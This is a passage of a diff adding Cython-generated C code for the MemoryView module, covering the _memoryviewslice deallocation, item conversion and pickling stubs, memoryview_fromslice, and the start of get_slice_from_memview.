__pyx_memoryviewslice_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(struct __pyx_memoryviewslice_obj *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":964 + * + * def __dealloc__(self): + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) # <<<<<<<<<<<<<< + * + * cdef convert_item_to_object(self, char *itemp): + */ + __PYX_XCLEAR_MEMVIEW((&__pyx_v_self->from_slice), 1); + + /* "View.MemoryView":963 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":966 + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) + */ + +static PyObject *__pyx_memoryviewslice_convert_item_to_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("convert_item_to_object", 0); + + /* "View.MemoryView":967 + * + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: # <<<<<<<<<<<<<< + * return self.to_object_func(itemp) + * else: + */ + __pyx_t_1 = (__pyx_v_self->to_object_func != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":968 + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) # <<<<<<<<<<<<<< + * else: + * return memoryview.convert_item_to_object(self, itemp) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_v_self->to_object_func(__pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 968, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":967 + * + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: # <<<<<<<<<<<<<< + * return self.to_object_func(itemp) + * else: + */ + } + + /* "View.MemoryView":970 + * return self.to_object_func(itemp) + * else: + * return memoryview.convert_item_to_object(self, itemp) # <<<<<<<<<<<<<< + * + * cdef assign_item_from_object(self, char *itemp, object value): + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_convert_item_to_object(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 970, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":966 + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":972 + * return memoryview.convert_item_to_object(self, itemp) + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) + */ + +static PyObject *__pyx_memoryviewslice_assign_item_from_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assign_item_from_object", 0); + + /* "View.MemoryView":973 + * + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: # <<<<<<<<<<<<<< + * self.to_dtype_func(itemp, value) + * else: + */ + __pyx_t_1 = (__pyx_v_self->to_dtype_func != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":974 + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) # <<<<<<<<<<<<<< + * else: + * memoryview.assign_item_from_object(self, itemp, value) + */ + __pyx_t_2 = __pyx_v_self->to_dtype_func(__pyx_v_itemp, __pyx_v_value); if (unlikely(__pyx_t_2 == ((int)0))) __PYX_ERR(1, 974, __pyx_L1_error) + + /* "View.MemoryView":973 + * + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: # <<<<<<<<<<<<<< + * self.to_dtype_func(itemp, value) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":976 + * self.to_dtype_func(itemp, value) + * else: + * memoryview.assign_item_from_object(self, itemp, value) # <<<<<<<<<<<<<< + * + * cdef _get_base(self): + */ + /*else*/ { + __pyx_t_3 = __pyx_memoryview_assign_item_from_object(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_itemp, __pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 976, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_L3:; + + /* "View.MemoryView":972 + * return memoryview.convert_item_to_object(self, itemp) + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.assign_item_from_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":978 + * memoryview.assign_item_from_object(self, itemp, value) + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.from_object + * + */ + +static PyObject *__pyx_memoryviewslice__get_base(struct __pyx_memoryviewslice_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_get_base", 0); + + /* "View.MemoryView":979 + * + * cdef _get_base(self): + * return self.from_object # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->from_object); + __pyx_r = __pyx_v_self->from_object; + goto __pyx_L0; + + /* "View.MemoryView":978 + * memoryview.assign_item_from_object(self, itemp, value) + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.from_object + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryviewslice_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryviewslice_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_memoryviewslice___reduce_cython__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryviewslice___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryviewslice_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryviewslice_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_memoryviewslice_2__setstate_cython__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryviewslice_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":999 + * + * @cname('__pyx_memoryview_fromslice') + * cdef memoryview_fromslice(__Pyx_memviewslice memviewslice, # <<<<<<<<<<<<<< + * int ndim, + * object (*to_object_func)(char *), + */ + +static PyObject *__pyx_memoryview_fromslice(__Pyx_memviewslice __pyx_v_memviewslice, int __pyx_v_ndim, PyObject *(*__pyx_v_to_object_func)(char *), int (*__pyx_v_to_dtype_func)(char *, PyObject *), int __pyx_v_dtype_is_object) { + struct __pyx_memoryviewslice_obj *__pyx_v_result = 0; + Py_ssize_t __pyx_v_suboffset; + PyObject *__pyx_v_length = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + __Pyx_TypeInfo *__pyx_t_4; + Py_buffer __pyx_t_5; + Py_ssize_t *__pyx_t_6; + Py_ssize_t *__pyx_t_7; + Py_ssize_t *__pyx_t_8; + Py_ssize_t __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_fromslice", 0); + + /* "View.MemoryView":1007 + * cdef _memoryviewslice result + * + * if memviewslice.memview == Py_None: # <<<<<<<<<<<<<< + * return None + * + */ + __pyx_t_1 = (((PyObject *)__pyx_v_memviewslice.memview) == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":1008 + * + * if memviewslice.memview == Py_None: + * return None # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "View.MemoryView":1007 + * cdef _memoryviewslice result + * + * if memviewslice.memview == Py_None: # <<<<<<<<<<<<<< + * return None + * + */ + } + + /* "View.MemoryView":1013 + * + * + * result = _memoryviewslice.__new__(_memoryviewslice, None, 0, dtype_is_object) # <<<<<<<<<<<<<< + * + * result.from_slice = memviewslice + */ + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_3, 0, Py_None); + __Pyx_INCREF(__pyx_int_0); + __Pyx_GIVEREF(__pyx_int_0); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_int_0); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_2 = 0; + __pyx_t_2 = ((PyObject *)__pyx_tp_new__memoryviewslice(((PyTypeObject *)__pyx_memoryviewslice_type), __pyx_t_3, NULL)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1015 + * result = _memoryviewslice.__new__(_memoryviewslice, None, 0, dtype_is_object) + * + * result.from_slice = memviewslice # <<<<<<<<<<<<<< + * __PYX_INC_MEMVIEW(&memviewslice, 1) + * + */ + __pyx_v_result->from_slice = __pyx_v_memviewslice; + + /* "View.MemoryView":1016 + * + * result.from_slice = memviewslice + * __PYX_INC_MEMVIEW(&memviewslice, 1) # <<<<<<<<<<<<<< + * + * result.from_object = ( memviewslice.memview)._get_base() + */ + __PYX_INC_MEMVIEW((&__pyx_v_memviewslice), 1); + + /* "View.MemoryView":1018 + * __PYX_INC_MEMVIEW(&memviewslice, 1) + * + * result.from_object = ( memviewslice.memview)._get_base() # <<<<<<<<<<<<<< + * result.typeinfo = memviewslice.memview.typeinfo + * + */ + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)->__pyx_vtab)->_get_base(((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1018, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_v_result->from_object); + __Pyx_DECREF(__pyx_v_result->from_object); + __pyx_v_result->from_object = __pyx_t_2; + __pyx_t_2 = 0; + + /* "View.MemoryView":1019 + * + * result.from_object = ( memviewslice.memview)._get_base() + * result.typeinfo = memviewslice.memview.typeinfo # <<<<<<<<<<<<<< + * + * result.view = memviewslice.memview.view + */ + __pyx_t_4 = __pyx_v_memviewslice.memview->typeinfo; + __pyx_v_result->__pyx_base.typeinfo = __pyx_t_4; + + /* "View.MemoryView":1021 + * result.typeinfo = memviewslice.memview.typeinfo + * + * result.view = memviewslice.memview.view # <<<<<<<<<<<<<< + * result.view.buf = memviewslice.data + * result.view.ndim = ndim + */ + __pyx_t_5 = __pyx_v_memviewslice.memview->view; + __pyx_v_result->__pyx_base.view = __pyx_t_5; + + /* "View.MemoryView":1022 + * + * result.view = memviewslice.memview.view + * result.view.buf = memviewslice.data # <<<<<<<<<<<<<< + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None + */ + __pyx_v_result->__pyx_base.view.buf = ((void *)__pyx_v_memviewslice.data); + + /* "View.MemoryView":1023 + * result.view = memviewslice.memview.view + * result.view.buf = memviewslice.data + * result.view.ndim = ndim # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &result.view).obj = Py_None + * Py_INCREF(Py_None) + */ + __pyx_v_result->__pyx_base.view.ndim = __pyx_v_ndim; + + /* "View.MemoryView":1024 + * result.view.buf = memviewslice.data + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_result->__pyx_base.view))->obj = Py_None; + + /* "View.MemoryView":1025 + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: + */ + Py_INCREF(Py_None); + + /* "View.MemoryView":1027 + * Py_INCREF(Py_None) + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: # <<<<<<<<<<<<<< + * result.flags = PyBUF_RECORDS + * else: + */ + __pyx_t_1 = ((((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)->flags & PyBUF_WRITABLE) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":1028 + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: + * result.flags = PyBUF_RECORDS # <<<<<<<<<<<<<< + * else: + * result.flags = PyBUF_RECORDS_RO + */ + __pyx_v_result->__pyx_base.flags = PyBUF_RECORDS; + + /* "View.MemoryView":1027 + * Py_INCREF(Py_None) + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: # <<<<<<<<<<<<<< + * result.flags = PyBUF_RECORDS + * else: + */ + goto __pyx_L4; + } + + /* "View.MemoryView":1030 + * result.flags = PyBUF_RECORDS + * else: + * result.flags = PyBUF_RECORDS_RO # <<<<<<<<<<<<<< + * + * result.view.shape = result.from_slice.shape + */ + /*else*/ { + __pyx_v_result->__pyx_base.flags = PyBUF_RECORDS_RO; + } + __pyx_L4:; + + /* "View.MemoryView":1032 + * result.flags = PyBUF_RECORDS_RO + * + * result.view.shape = result.from_slice.shape # <<<<<<<<<<<<<< + * result.view.strides = result.from_slice.strides + * + */ + __pyx_v_result->__pyx_base.view.shape = ((Py_ssize_t *)__pyx_v_result->from_slice.shape); + + /* "View.MemoryView":1033 + * + * result.view.shape = result.from_slice.shape + * result.view.strides = result.from_slice.strides # <<<<<<<<<<<<<< + * + * + */ + __pyx_v_result->__pyx_base.view.strides = ((Py_ssize_t *)__pyx_v_result->from_slice.strides); + + /* "View.MemoryView":1036 + * + * + * result.view.suboffsets = NULL # <<<<<<<<<<<<<< + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: + */ + __pyx_v_result->__pyx_base.view.suboffsets = NULL; + + /* "View.MemoryView":1037 + * + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: # <<<<<<<<<<<<<< + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets + */ + __pyx_t_7 = (__pyx_v_result->from_slice.suboffsets + __pyx_v_ndim); + for (__pyx_t_8 = __pyx_v_result->from_slice.suboffsets; __pyx_t_8 < __pyx_t_7; __pyx_t_8++) { + __pyx_t_6 = __pyx_t_8; + __pyx_v_suboffset = (__pyx_t_6[0]); + + /* "View.MemoryView":1038 + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * result.view.suboffsets = result.from_slice.suboffsets + * break + */ + __pyx_t_1 = (__pyx_v_suboffset >= 0); + if (__pyx_t_1) { + + /* "View.MemoryView":1039 + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets # <<<<<<<<<<<<<< + * break + * + */ + __pyx_v_result->__pyx_base.view.suboffsets = ((Py_ssize_t *)__pyx_v_result->from_slice.suboffsets); + + /* "View.MemoryView":1040 + * if suboffset >= 0: + * result.view.suboffsets = result.from_slice.suboffsets + * break # <<<<<<<<<<<<<< + * + * result.view.len = result.view.itemsize + */ + goto __pyx_L6_break; + + /* "View.MemoryView":1038 + * result.view.suboffsets = NULL + * for suboffset in result.from_slice.suboffsets[:ndim]: + * if suboffset >= 0: # <<<<<<<<<<<<<< + * result.view.suboffsets = result.from_slice.suboffsets + * break + */ + } + } + __pyx_L6_break:; + + /* "View.MemoryView":1042 + * break + * + * result.view.len = result.view.itemsize # <<<<<<<<<<<<<< + * for length in result.view.shape[:ndim]: + * result.view.len *= length + */ + __pyx_t_9 = __pyx_v_result->__pyx_base.view.itemsize; + __pyx_v_result->__pyx_base.view.len = __pyx_t_9; + + /* "View.MemoryView":1043 + * + * result.view.len = result.view.itemsize + * for length in result.view.shape[:ndim]: # <<<<<<<<<<<<<< + * result.view.len *= length + * + */ + __pyx_t_7 = (__pyx_v_result->__pyx_base.view.shape + __pyx_v_ndim); + for (__pyx_t_8 = __pyx_v_result->__pyx_base.view.shape; __pyx_t_8 < __pyx_t_7; __pyx_t_8++) { + __pyx_t_6 = __pyx_t_8; + __pyx_t_2 = PyInt_FromSsize_t((__pyx_t_6[0])); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1043, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_length, __pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1044 + * result.view.len = result.view.itemsize + * for length in result.view.shape[:ndim]: + * result.view.len *= length # <<<<<<<<<<<<<< + * + * result.to_object_func = to_object_func + */ + __pyx_t_2 = PyInt_FromSsize_t(__pyx_v_result->__pyx_base.view.len); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyNumber_InPlaceMultiply(__pyx_t_2, __pyx_v_length); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_9 = __Pyx_PyIndex_AsSsize_t(__pyx_t_3); if (unlikely((__pyx_t_9 == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 1044, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result->__pyx_base.view.len = __pyx_t_9; + } + + /* "View.MemoryView":1046 + * result.view.len *= length + * + * result.to_object_func = to_object_func # <<<<<<<<<<<<<< + * result.to_dtype_func = to_dtype_func + * + */ + __pyx_v_result->to_object_func = __pyx_v_to_object_func; + + /* "View.MemoryView":1047 + * + * result.to_object_func = to_object_func + * result.to_dtype_func = to_dtype_func # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_v_result->to_dtype_func = __pyx_v_to_dtype_func; + + /* "View.MemoryView":1049 + * result.to_dtype_func = to_dtype_func + * + * return result # <<<<<<<<<<<<<< + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = ((PyObject *)__pyx_v_result); + goto __pyx_L0; + + /* "View.MemoryView":999 + * + * @cname('__pyx_memoryview_fromslice') + * cdef memoryview_fromslice(__Pyx_memviewslice memviewslice, # <<<<<<<<<<<<<< + * int ndim, + * object (*to_object_func)(char *), + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview_fromslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XDECREF(__pyx_v_length); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":1052 + * + * @cname('__pyx_memoryview_get_slice_from_memoryview') + * cdef __Pyx_memviewslice *get_slice_from_memview(memoryview memview, # <<<<<<<<<<<<<< + * __Pyx_memviewslice *mslice) except NULL: + * cdef _memoryviewslice obj + */ + +static __Pyx_memviewslice *__pyx_memoryview_get_slice_from_memoryview(struct __pyx_memoryview_obj *__pyx_v_memview, __Pyx_memviewslice *__pyx_v_mslice) { + struct __pyx_memoryviewslice_obj *__pyx_v_obj = 0; + __Pyx_memviewslice *__pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + 